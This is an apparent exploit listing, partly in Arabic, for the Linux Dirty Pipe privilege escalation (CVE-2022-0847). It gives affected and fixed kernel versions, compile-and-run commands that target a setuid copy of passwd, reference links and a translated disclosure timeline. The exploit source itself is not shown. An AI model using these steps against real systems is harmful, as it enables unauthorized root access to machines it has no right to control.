
استغلال تصعيد الامتيازات المحلية لنواة لينكس CVE-2022-0847 (Dirty Pipe)، مما يسمح بالكتابة فوق الملفات التعسفية وتصعيد الامتيازات على الأنظمة المتأثرة.
Exploit Title: Local Privilege Escalation in Linux kernel (CVE-2022-0847)
Tested on: ubuntu 20.04.1 LTS
Affect product:Linux kernel 5.8 or later
Fixed Product:Linux kernel 5.16.11, 5.15.25, 5.10.102
CVE ID: CVE-2022-0847
رفع الامتيازات المحلية
gcc exploit.c -o exploit
cp /bin/passwd .
sudo chown root:root ./passwd
sudo chmod +s ./passwd
./exploit ./passwd
https://dirtypipe.cm4all.com/ https://sysdig.com/blog/cve-2022-0847-dirty-pipe-sysdig/
2021-04-29: أول تذكرة دعم حول تلف الملف
2022-02-19: تم تحديد مشكلة تلف الملف كخلل في نواة لينكس، والذي تبين أنه ثغرة قابلة للاستغلال
2022-02-20: إرسال تقرير الخلل والاستغلال والتصحيح إلى فريق أمان نواة لينكس
2022-02-21: إعادة إنتاج الخلل على Google Pixel 6؛ إرسال تقرير الخلل إلى فريق أمان أندرويد
2022-02-21: إرسال التصحيح إلى LKML (بدون تفاصيل الثغرة) كما اقترح لينوس تورفالدز، ويلي تارو، وآل فيرو
2022-02-23: إصدارات لينكس المستقرة مع إصلاح الخلل الخاص بي (5.16.11، 5.15.25، 5.10.102)
2022-02-24: جوجل تدمج إصلاح الخلل الخاص بي في نواة أندرويد
2022-02-28: إخطار القائمة البريدية linux-distros
2022-03-07: الإفصاح العام